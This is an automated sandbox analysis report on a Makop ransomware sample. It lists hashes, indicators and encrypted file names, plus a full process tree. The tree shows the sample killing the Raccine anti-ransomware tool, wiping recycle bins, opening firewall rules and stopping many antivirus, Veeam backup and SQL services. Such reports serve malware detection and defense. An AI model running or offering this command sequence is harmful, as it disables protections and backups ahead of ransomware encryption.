Analysis
-
max time kernel
120s -
max time network
121s -
platform
windows10_x64 -
resource
win10v20210410 -
submitted
23-04-2021 13:03
Static task
static1
Behavioral task
behavioral1
Sample
net_shares.exe
Resource
win7v20210408
Behavioral task
behavioral2
Sample
net_shares.exe
Resource
win10v20210410
General
-
Target
net_shares.exe
-
Size
114KB
-
MD5
07807a9e2aeb0ccc03d88debebcdd2eb
-
SHA1
13a93e6e785d8f42f062b55fe5ea1ba9e0e139ab
-
SHA256
1136907e76399f1d76694ee9c540b387ed6a5b12340b60f3fabfc183bca457df
-
SHA512
1cc1ecab6047c7cc2e81b6b5a9266c25fd9d2a7d26865c0e7554882c0f28f47453fb3c6abc9a613f9af62cf4dd456d079da67897459c9f4d88adb7715547093a
Malware Config
Extracted
C:\Users\Admin\AppData\Local\Temp\RESTORE_FILES_INFO.txt
makop
Extracted
C:\Users\Admin\Desktop\RESTORE_FILES_INFO.txt
makop
Signatures
-
Makop
Ransomware family discovered by @VK_Intel in early 2020.
-
Modifies Windows Firewall 1 TTPs
-
Drops startup file 1 IoCs
Processes:
net_shares.exedescription ioc process File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\mystartup.lnk net_shares.exe -
Modifies file permissions 1 TTPs 3 IoCs
Processes:
icacls.exeicacls.exeicacls.exepid process 4808 icacls.exe 4012 icacls.exe 1256 icacls.exe -
Drops file in Program Files directory 18 IoCs
Processes:
net_shares.exedescription ioc process File opened for modification C:\Program Files\ConvertToSkip.odp.[ID-A2C56C1C].uo8bpy net_shares.exe File opened for modification C:\Program Files\SwitchOpen.lnk.[ID-A2C56C1C].uo8bpy net_shares.exe File opened for modification C:\Program Files\UnblockRevoke.xla.[ID-A2C56C1C].uo8bpy net_shares.exe File opened for modification C:\Program Files\UninstallRequest.docx.[ID-A2C56C1C].uo8bpy net_shares.exe File opened for modification C:\Program Files\HideSync.wmf.[ID-A2C56C1C].uo8bpy net_shares.exe File opened for modification C:\Program Files\JoinConvertTo.html.[ID-A2C56C1C].uo8bpy net_shares.exe File opened for modification C:\Program Files\ResumeBlock.wmf.[ID-A2C56C1C].uo8bpy net_shares.exe File opened for modification C:\Program Files\FindUninstall.bat.[ID-A2C56C1C].uo8bpy net_shares.exe File opened for modification C:\Program Files\GroupTest.hta.[ID-A2C56C1C].uo8bpy net_shares.exe File opened for modification C:\Program Files\ReadFind.xlt.[ID-A2C56C1C].uo8bpy net_shares.exe File opened for modification C:\Program Files\RenameMount.asf.[ID-A2C56C1C].uo8bpy net_shares.exe File opened for modification C:\Program Files\SearchUndo.midi.[ID-A2C56C1C].uo8bpy net_shares.exe File opened for modification C:\Program Files\ApproveSelect.mpv2.[ID-A2C56C1C].uo8bpy net_shares.exe File opened for modification C:\Program Files\EnableCheckpoint.bat.[ID-A2C56C1C].uo8bpy net_shares.exe File opened for modification C:\Program Files\ExpandRedo.scf.[ID-A2C56C1C].uo8bpy net_shares.exe File opened for modification C:\Program Files\SelectNew.vbs.[ID-A2C56C1C].uo8bpy net_shares.exe File opened for modification C:\Program Files\SyncStop.avi.[ID-A2C56C1C].uo8bpy net_shares.exe File opened for modification C:\Program Files\ReadResume.pot.[ID-A2C56C1C].uo8bpy net_shares.exe -
Drops file in Windows directory 11 IoCs
Processes:
net_shares.exedescription ioc process File opened for modification C:\Windows\WindowsShell.Manifest net_shares.exe File opened for modification C:\Windows\WindowsUpdate.log.[ID-A2C56C1C].uo8bpy net_shares.exe File created C:\Windows\RESTORE_FILES_INFO.txt net_shares.exe File opened for modification C:\Windows\DtcInstall.log.[ID-A2C56C1C].uo8bpy net_shares.exe File opened for modification C:\Windows\lsasetup.log.[ID-A2C56C1C].uo8bpy net_shares.exe File opened for modification C:\Windows\Professional.xml.[ID-A2C56C1C].uo8bpy net_shares.exe File opened for modification C:\Windows\win.ini.[ID-A2C56C1C].uo8bpy net_shares.exe File created C:\Windows\bootstat.dat.[ID-A2C56C1C].uo8bpy net_shares.exe File opened for modification C:\Windows\PFRO.log.[ID-A2C56C1C].uo8bpy net_shares.exe File opened for modification C:\Windows\setupact.log.[ID-A2C56C1C].uo8bpy net_shares.exe File opened for modification C:\Windows\system.ini.[ID-A2C56C1C].uo8bpy net_shares.exe -
Launches sc.exe
Sc.exe is a Windows utlilty to control services on the system.
-
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
-
Kills process with taskkill 48 IoCs
Processes:
taskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exepid process 2300 taskkill.exe 3168 taskkill.exe 4412 taskkill.exe 4960 taskkill.exe 1092 taskkill.exe 4272 taskkill.exe 4652 taskkill.exe 5112 taskkill.exe 4904 taskkill.exe 4328 taskkill.exe 2724 taskkill.exe 4316 taskkill.exe 2080 taskkill.exe 4304 taskkill.exe 4132 taskkill.exe 3172 taskkill.exe 3712 taskkill.exe 4848 taskkill.exe 2144 taskkill.exe 4408 taskkill.exe 4656 taskkill.exe 4392 taskkill.exe 4648 taskkill.exe 5080 taskkill.exe 4472 taskkill.exe 2408 taskkill.exe 4160 taskkill.exe 4552 taskkill.exe 4324 taskkill.exe 4236 taskkill.exe 1120 taskkill.exe 4640 taskkill.exe 4752 taskkill.exe 4352 taskkill.exe 2368 taskkill.exe 2664 taskkill.exe 1736 taskkill.exe 4240 taskkill.exe 5116 taskkill.exe 4952 taskkill.exe 4308 taskkill.exe 4308 taskkill.exe 184 taskkill.exe 2248 taskkill.exe 2932 taskkill.exe 4320 taskkill.exe 1736 taskkill.exe 4700 taskkill.exe -
Modifies registry key 1 TTPs 1 IoCs
-
Opens file in notepad (likely ransom note) 1 IoCs
Processes:
notepad.exepid process 4724 notepad.exe -
Runs net.exe
-
Runs ping.exe 1 TTPs 1 IoCs
-
Suspicious behavior: EnumeratesProcesses 64 IoCs
Processes:
net_shares.exepid process 3968 net_shares.exe 3968 net_shares.exe 3968 net_shares.exe 3968 net_shares.exe 3968 net_shares.exe 3968 net_shares.exe 3968 net_shares.exe 3968 net_shares.exe 3968 net_shares.exe 3968 net_shares.exe 3968 net_shares.exe 3968 net_shares.exe 3968 net_shares.exe 3968 net_shares.exe 3968 net_shares.exe 3968 net_shares.exe 3968 net_shares.exe 3968 net_shares.exe 3968 net_shares.exe 3968 net_shares.exe 3968 net_shares.exe 3968 net_shares.exe 3968 net_shares.exe 3968 net_shares.exe 3968 net_shares.exe 3968 net_shares.exe 3968 net_shares.exe 3968 net_shares.exe 3968 net_shares.exe 3968 net_shares.exe 3968 net_shares.exe 3968 net_shares.exe 3968 net_shares.exe 3968 net_shares.exe 3968 net_shares.exe 3968 net_shares.exe 3968 net_shares.exe 3968 net_shares.exe 3968 net_shares.exe 3968 net_shares.exe 3968 net_shares.exe 3968 net_shares.exe 3968 net_shares.exe 3968 net_shares.exe 3968 net_shares.exe 3968 net_shares.exe 3968 net_shares.exe 3968 net_shares.exe 3968 net_shares.exe 3968 net_shares.exe 3968 net_shares.exe 3968 net_shares.exe 3968 net_shares.exe 3968 net_shares.exe 3968 net_shares.exe 3968 net_shares.exe 3968 net_shares.exe 3968 net_shares.exe 3968 net_shares.exe 3968 net_shares.exe 3968 net_shares.exe 3968 net_shares.exe 3968 net_shares.exe 3968 net_shares.exe -
Suspicious use of AdjustPrivilegeToken 49 IoCs
Processes:
net_shares.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exenet.exetaskkill.exetaskkill.exenet.exetaskkill.exetaskkill.exeConhost.exetaskkill.exeConhost.exetaskkill.exetaskkill.exeConhost.exeConhost.exeConhost.exetaskkill.exetaskkill.exenet.exeConhost.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exeConhost.exetaskkill.exenet.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exenet.exetaskkill.exetaskkill.exetaskkill.exeConhost.exetaskkill.exepowershell.exedescription pid process Token: SeDebugPrivilege 3968 net_shares.exe Token: SeDebugPrivilege 2408 taskkill.exe Token: SeDebugPrivilege 4848 taskkill.exe Token: SeDebugPrivilege 2664 taskkill.exe Token: SeDebugPrivilege 2248 taskkill.exe Token: SeDebugPrivilege 4960 taskkill.exe Token: SeDebugPrivilege 1092 net.exe Token: SeDebugPrivilege 1736 taskkill.exe Token: SeDebugPrivilege 4272 taskkill.exe Token: SeDebugPrivilege 4240 net.exe Token: SeDebugPrivilege 5116 taskkill.exe Token: SeDebugPrivilege 4160 taskkill.exe Token: SeDebugPrivilege 2724 Conhost.exe Token: SeDebugPrivilege 4308 taskkill.exe Token: SeDebugPrivilege 4316 Conhost.exe Token: SeDebugPrivilege 2932 taskkill.exe Token: SeDebugPrivilege 2144 taskkill.exe Token: SeDebugPrivilege 4320 Conhost.exe Token: SeDebugPrivilege 4552 Conhost.exe Token: SeDebugPrivilege 4952 Conhost.exe Token: SeDebugPrivilege 4752 taskkill.exe Token: SeDebugPrivilege 184 taskkill.exe Token: SeDebugPrivilege 2300 net.exe Token: SeDebugPrivilege 4236 Conhost.exe Token: SeDebugPrivilege 4648 taskkill.exe Token: SeDebugPrivilege 2080 taskkill.exe Token: SeDebugPrivilege 5080 taskkill.exe Token: SeDebugPrivilege 4352 taskkill.exe Token: SeDebugPrivilege 4304 taskkill.exe Token: SeDebugPrivilege 2368 taskkill.exe Token: SeDebugPrivilege 4132 taskkill.exe Token: SeDebugPrivilege 4408 taskkill.exe Token: SeDebugPrivilege 4472 taskkill.exe Token: SeDebugPrivilege 4652 Conhost.exe Token: SeDebugPrivilege 4904 taskkill.exe Token: SeDebugPrivilege 4328 net.exe Token: SeDebugPrivilege 1120 taskkill.exe Token: SeDebugPrivilege 3168 taskkill.exe Token: SeDebugPrivilege 4656 taskkill.exe Token: SeDebugPrivilege 5112 taskkill.exe Token: SeDebugPrivilege 1736 taskkill.exe Token: SeDebugPrivilege 4392 net.exe Token: SeDebugPrivilege 3172 taskkill.exe Token: SeDebugPrivilege 4640 taskkill.exe Token: SeDebugPrivilege 3712 taskkill.exe Token: SeDebugPrivilege 4412 Conhost.exe Token: SeDebugPrivilege 4308 taskkill.exe Token: SeDebugPrivilege 4700 taskkill.exe Token: SeDebugPrivilege 1848 powershell.exe -
Suspicious use of FindShellTrayWindow 1 IoCs
Processes:
net_shares.exepid process 3968 net_shares.exe -
Suspicious use of SendNotifyMessage 1 IoCs
Processes:
net_shares.exepid process 3968 net_shares.exe -
Suspicious use of WriteProcessMemory 64 IoCs
Processes:
net_shares.exenet.exenet.exenet.exenet.exenet.exenet.exenet.exenet.exedescription pid process target process PID 3968 wrote to memory of 2408 3968 net_shares.exe taskkill.exe PID 3968 wrote to memory of 2408 3968 net_shares.exe taskkill.exe PID 3968 wrote to memory of 2984 3968 net_shares.exe reg.exe PID 3968 wrote to memory of 2984 3968 net_shares.exe reg.exe PID 3968 wrote to memory of 3340 3968 net_shares.exe reg.exe PID 3968 wrote to memory of 3340 3968 net_shares.exe reg.exe PID 3968 wrote to memory of 4080 3968 net_shares.exe schtasks.exe PID 3968 wrote to memory of 4080 3968 net_shares.exe schtasks.exe PID 3968 wrote to memory of 2320 3968 net_shares.exe cmd.exe PID 3968 wrote to memory of 2320 3968 net_shares.exe cmd.exe PID 3968 wrote to memory of 416 3968 net_shares.exe sc.exe PID 3968 wrote to memory of 416 3968 net_shares.exe sc.exe PID 3968 wrote to memory of 3964 3968 net_shares.exe sc.exe PID 3968 wrote to memory of 3964 3968 net_shares.exe sc.exe PID 3968 wrote to memory of 296 3968 net_shares.exe sc.exe PID 3968 wrote to memory of 296 3968 net_shares.exe sc.exe PID 3968 wrote to memory of 1564 3968 net_shares.exe sc.exe PID 3968 wrote to memory of 1564 3968 net_shares.exe sc.exe PID 3968 wrote to memory of 2892 3968 net_shares.exe cmd.exe PID 3968 wrote to memory of 2892 3968 net_shares.exe cmd.exe PID 3968 wrote to memory of 3808 3968 net_shares.exe sc.exe PID 3968 wrote to memory of 3808 3968 net_shares.exe sc.exe PID 3968 wrote to memory of 1248 3968 net_shares.exe sc.exe PID 3968 wrote to memory of 1248 3968 net_shares.exe sc.exe PID 3968 wrote to memory of 1224 3968 net_shares.exe sc.exe PID 3968 wrote to memory of 1224 3968 net_shares.exe sc.exe PID 3968 wrote to memory of 3092 3968 net_shares.exe sc.exe PID 3968 wrote to memory of 3092 3968 net_shares.exe sc.exe PID 3968 wrote to memory of 3912 3968 net_shares.exe netsh.exe PID 3968 wrote to memory of 3912 3968 net_shares.exe netsh.exe PID 3968 wrote to memory of 1348 3968 net_shares.exe net.exe PID 3968 wrote to memory of 1348 3968 net_shares.exe net.exe PID 3968 wrote to memory of 3936 3968 net_shares.exe net.exe PID 3968 wrote to memory of 3936 3968 net_shares.exe net.exe PID 3968 wrote to memory of 3488 3968 net_shares.exe net.exe PID 3968 wrote to memory of 3488 3968 net_shares.exe net.exe PID 1348 wrote to memory of 2932 1348 net.exe net1.exe PID 1348 wrote to memory of 2932 1348 net.exe net1.exe PID 3936 wrote to memory of 1252 3936 net.exe net1.exe PID 3936 wrote to memory of 1252 3936 net.exe net1.exe PID 3488 wrote to memory of 2948 3488 net.exe net1.exe PID 3488 wrote to memory of 2948 3488 net.exe net1.exe PID 3968 wrote to memory of 2476 3968 net_shares.exe net.exe PID 3968 wrote to memory of 2476 3968 net_shares.exe net.exe PID 3968 wrote to memory of 1524 3968 net_shares.exe net.exe PID 3968 wrote to memory of 1524 3968 net_shares.exe net.exe PID 2476 wrote to memory of 572 2476 net.exe svchost.exe PID 2476 wrote to memory of 572 2476 net.exe svchost.exe PID 1524 wrote to memory of 2128 1524 net.exe net1.exe PID 1524 wrote to memory of 2128 1524 net.exe net1.exe PID 3968 wrote to memory of 2112 3968 net_shares.exe net.exe PID 3968 wrote to memory of 2112 3968 net_shares.exe net.exe PID 3968 wrote to memory of 1836 3968 net_shares.exe net.exe PID 3968 wrote to memory of 1836 3968 net_shares.exe net.exe PID 2112 wrote to memory of 1328 2112 net.exe net1.exe PID 2112 wrote to memory of 1328 2112 net.exe net1.exe PID 1836 wrote to memory of 540 1836 net.exe net1.exe PID 1836 wrote to memory of 540 1836 net.exe net1.exe PID 3968 wrote to memory of 3616 3968 net_shares.exe net.exe PID 3968 wrote to memory of 3616 3968 net_shares.exe net.exe PID 3616 wrote to memory of 3980 3616 net.exe Conhost.exe PID 3616 wrote to memory of 3980 3616 net.exe Conhost.exe PID 3968 wrote to memory of 4116 3968 net_shares.exe net.exe PID 3968 wrote to memory of 4116 3968 net_shares.exe net.exe
Processes
-
C:\Users\Admin\AppData\Local\Temp\net_shares.exe"C:\Users\Admin\AppData\Local\Temp\net_shares.exe"1⤵
- Drops startup file
- Drops file in Program Files directory
- Drops file in Windows directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
- Suspicious use of WriteProcessMemory
-
C:\Windows\SYSTEM32\taskkill.exe"taskkill" /F /IM RaccineSettings.exe2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SYSTEM32\reg.exe"reg" delete "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /V "Raccine Tray" /F2⤵
-
C:\Windows\SYSTEM32\reg.exe"reg" delete HKCU\Software\Raccine /F2⤵
- Modifies registry key
-
C:\Windows\SYSTEM32\schtasks.exe"schtasks" /DELETE /TN "Raccine Rules Updater" /F2⤵
-
C:\Windows\SYSTEM32\cmd.exe"cmd.exe" /c rd /s /q %SYSTEMDRIVE%\\$Recycle.bin2⤵
-
C:\Windows\SYSTEM32\sc.exe"sc.exe" config Dnscache start= auto2⤵
-
C:\Windows\SYSTEM32\sc.exe"sc.exe" config SQLTELEMETRY start= disabled2⤵
-
C:\Windows\SYSTEM32\sc.exe"sc.exe" config SSDPSRV start= auto2⤵
-
C:\Windows\SYSTEM32\cmd.exe"cmd.exe" /c rd /s /q D:\\$Recycle.bin2⤵
-
C:\Windows\SYSTEM32\sc.exe"sc.exe" config FDResPub start= auto2⤵
-
C:\Windows\SYSTEM32\sc.exe"sc.exe" config SQLTELEMETRY$ECWDB2 start= disabled2⤵
-
C:\Windows\SYSTEM32\sc.exe"sc.exe" config SstpSvc start= disabled2⤵
-
C:\Windows\SYSTEM32\sc.exe"sc.exe" config upnphost start= auto2⤵
-
C:\Windows\SYSTEM32\sc.exe"sc.exe" config SQLWriter start= disabled2⤵
-
C:\Windows\SYSTEM32\netsh.exe"netsh" advfirewall firewall set rule group=\"Network Discovery\" new enable=Yes2⤵
-
C:\Windows\SYSTEM32\net.exe"net.exe" start Dnscache /y2⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 start Dnscache /y3⤵
-
C:\Windows\SYSTEM32\net.exe"net.exe" start FDResPub /y2⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 start FDResPub /y3⤵
-
C:\Windows\SYSTEM32\net.exe"net.exe" stop bedbg /y2⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop bedbg /y3⤵
-
C:\Windows\SYSTEM32\net.exe"net.exe" stop MSSQL$SQL_2008 /y2⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop MSSQL$SQL_2008 /y3⤵
-
C:\Windows\SYSTEM32\net.exe"net.exe" start SSDPSRV /y2⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 start SSDPSRV /y3⤵
-
C:\Windows\SYSTEM32\net.exe"net.exe" stop EhttpSrv /y2⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop EhttpSrv /y3⤵
-
C:\Windows\SYSTEM32\net.exe"net.exe" start upnphost /y2⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 start upnphost /y3⤵
-
C:\Windows\SYSTEM32\net.exe"net.exe" stop MMS /y2⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop MMS /y3⤵
-
C:\Windows\SYSTEM32\net.exe"net.exe" stop MSSQL$SQLEXPRESS /y2⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop MSSQL$SQLEXPRESS /y3⤵
-
C:\Windows\SYSTEM32\net.exe"net.exe" stop ekrn /y2⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop ekrn /y3⤵
-
C:\Windows\SYSTEM32\net.exe"net.exe" stop mozyprobackup /y2⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop mozyprobackup /y3⤵
-
C:\Windows\SYSTEM32\net.exe"net.exe" stop MSSQL$SYSTEM_BGC /y2⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop MSSQL$SYSTEM_BGC /y3⤵
-
C:\Windows\SYSTEM32\net.exe"net.exe" stop PDVFSService /y2⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop PDVFSService /y3⤵
-
C:\Windows\SYSTEM32\net.exe"net.exe" stop MSSQL$VEEAMSQL2008R2 /y2⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop MSSQL$VEEAMSQL2008R2 /y3⤵
-
C:\Windows\SYSTEM32\net.exe"net.exe" stop EPSecurityService /y2⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop EPSecurityService /y3⤵
-
C:\Windows\SYSTEM32\net.exe"net.exe" stop ESHASRV /y2⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop ESHASRV /y3⤵
-
C:\Windows\SYSTEM32\net.exe"net.exe" stop MSSQL$VEEAMSQL2008R2 /y2⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop MSSQL$VEEAMSQL2008R2 /y3⤵
-
C:\Windows\SYSTEM32\net.exe"net.exe" stop SDRSVC /y2⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop SDRSVC /y3⤵
-
C:\Windows\SYSTEM32\net.exe"net.exe" stop MSSQL$TPS /y2⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop MSSQL$TPS /y3⤵
-
C:\Windows\SYSTEM32\net.exe"net.exe" stop MSSQL$VEEAMSQL2012 /y2⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop MSSQL$VEEAMSQL2012 /y3⤵
-
C:\Windows\SYSTEM32\net.exe"net.exe" stop EPUpdateService /y2⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop EPUpdateService /y3⤵
-
C:\Windows\SYSTEM32\net.exe"net.exe" stop FA_Scheduler /y2⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop FA_Scheduler /y3⤵
-
C:\Windows\SYSTEM32\net.exe"net.exe" stop ntrtscan /y2⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop ntrtscan /y3⤵
-
C:\Windows\SYSTEM32\net.exe"net.exe" stop SQLAgent$VEEAMSQL2008R2 /y2⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop SQLAgent$VEEAMSQL2008R2 /y3⤵
-
C:\Windows\SYSTEM32\net.exe"net.exe" stop MSSQL$TPSAMA /y2⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop MSSQL$TPSAMA /y3⤵
-
C:\Windows\SYSTEM32\netsh.exe"netsh" advfirewall firewall set rule group="File and Printer Sharing" new enable=Yes2⤵
-
C:\Windows\SYSTEM32\net.exe"net.exe" stop MSSQLFDLauncher$PROFXENGAGEMENT /y2⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop MSSQLFDLauncher$PROFXENGAGEMENT /y3⤵
-
C:\Windows\SYSTEM32\net.exe"net.exe" stop EsgShKernel /y2⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop EsgShKernel /y3⤵
-
C:\Windows\SYSTEM32\net.exe"net.exe" stop KAVFS /y2⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop KAVFS /y3⤵
-
C:\Windows\SYSTEM32\net.exe"net.exe" stop VeeamBrokerSvc /y2⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop VeeamBrokerSvc /y3⤵
-
C:\Windows\SYSTEM32\net.exe"net.exe" stop SQLWriter /y2⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop SQLWriter /y3⤵
-
C:\Windows\SYSTEM32\net.exe"net.exe" stop MSSQLFDLauncher$SQL_2008 /y2⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop MSSQLFDLauncher$SQL_2008 /y3⤵
-
C:\Windows\SYSTEM32\net.exe"net.exe" stop MSSQLFDLauncher$SBSMONITORING /y2⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop MSSQLFDLauncher$SBSMONITORING /y3⤵
-
C:\Windows\SYSTEM32\net.exe"net.exe" stop klnagent /y2⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop klnagent /y3⤵
-
C:\Windows\SYSTEM32\net.exe"net.exe" stop KAVFSGT /y2⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop KAVFSGT /y3⤵
-
C:\Windows\SYSTEM32\net.exe"net.exe" stop VeeamCatalogSvc /y2⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop VeeamCatalogSvc /y3⤵
-
C:\Windows\SYSTEM32\net.exe"net.exe" stop VeeamBackupSvc /y2⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop VeeamBackupSvc /y3⤵
-
C:\Windows\SYSTEM32\net.exe"net.exe" stop MSSQLFDLauncher$SHAREPOINT /y2⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop MSSQLFDLauncher$SHAREPOINT /y3⤵
-
C:\Windows\SYSTEM32\net.exe"net.exe" stop MSSQLFDLauncher$SYSTEM_BGC /y2⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop MSSQLFDLauncher$SYSTEM_BGC /y3⤵
-
C:\Windows\SYSTEM32\net.exe"net.exe" stop macmnsvc /y2⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop macmnsvc /y3⤵
-
C:\Windows\SYSTEM32\net.exe"net.exe" stop kavfsslp /y2⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop kavfsslp /y3⤵
-
C:\Windows\SYSTEM32\net.exe"net.exe" stop VeeamCloudSvc /y2⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop VeeamCloudSvc /y3⤵
-
C:\Windows\SYSTEM32\net.exe"net.exe" stop MSSQLServerADHelper /y2⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop MSSQLServerADHelper /y3⤵
-
C:\Windows\SYSTEM32\net.exe"net.exe" stop MSSQLFDLauncher$TPS /y2⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop MSSQLFDLauncher$TPS /y3⤵
-
C:\Windows\SYSTEM32\net.exe"net.exe" stop McAfeeEngineService /y2⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop McAfeeEngineService /y3⤵
-
C:\Windows\SYSTEM32\net.exe"net.exe" stop masvc /y2⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop masvc /y3⤵
-
C:\Windows\SYSTEM32\net.exe"net.exe" stop VeeamHvIntegrationSvc /y2⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop VeeamHvIntegrationSvc /y3⤵
-
C:\Windows\SYSTEM32\net.exe"net.exe" stop VeeamDeploymentService /y2⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop VeeamDeploymentService /y3⤵
-
C:\Windows\SYSTEM32\net.exe"net.exe" stop MSSQLServerADHelper100 /y2⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop MSSQLServerADHelper100 /y3⤵
-
C:\Windows\SYSTEM32\net.exe"net.exe" stop MSSQLFDLauncher$TPSAMA /y2⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop MSSQLFDLauncher$TPSAMA /y3⤵
-
C:\Windows\SYSTEM32\net.exe"net.exe" stop McAfeeFramework /y2⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop McAfeeFramework /y3⤵
-
C:\Windows\SYSTEM32\net.exe"net.exe" stop MBAMService /y2⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop MBAMService /y3⤵
-
C:\Windows\SYSTEM32\net.exe"net.exe" stop VeeamMountSvc /y2⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop VeeamMountSvc /y3⤵
-
C:\Windows\SYSTEM32\net.exe"net.exe" stop VeeamDeploySvc /y2⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop VeeamDeploySvc /y3⤵
-
C:\Windows\SYSTEM32\net.exe"net.exe" stop MSSQLSERVER /y2⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop MSSQLSERVER /y3⤵
-
C:\Windows\SYSTEM32\net.exe"net.exe" stop MSSQLServerOLAPService /y2⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop MSSQLServerOLAPService /y3⤵
-
C:\Windows\SYSTEM32\net.exe"net.exe" stop McAfeeFrameworkMcAfeeFramework /y2⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop McAfeeFrameworkMcAfeeFramework /y3⤵
-
C:\Windows\SYSTEM32\net.exe"net.exe" stop MBEndpointAgent /y2⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop MBEndpointAgent /y3⤵
-
C:\Windows\SYSTEM32\net.exe"net.exe" stop avpsus /y2⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop avpsus /y3⤵
-
C:\Windows\SYSTEM32\net.exe"net.exe" stop VeeamEnterpriseManagerSvc /y2⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop VeeamEnterpriseManagerSvc /y3⤵
-
C:\Windows\SYSTEM32\net.exe"net.exe" stop VeeamNFSSvc /y2⤵
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV13⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop VeeamNFSSvc /y3⤵
-
C:\Windows\SYSTEM32\net.exe"net.exe" stop McAfeeDLPAgentService /y2⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop McAfeeDLPAgentService /y3⤵
-
C:\Windows\SYSTEM32\net.exe"net.exe" stop mfefire /y2⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop mfefire /y3⤵
-
C:\Windows\SYSTEM32\net.exe"net.exe" stop MySQL57 /y2⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop MySQL57 /y3⤵
-
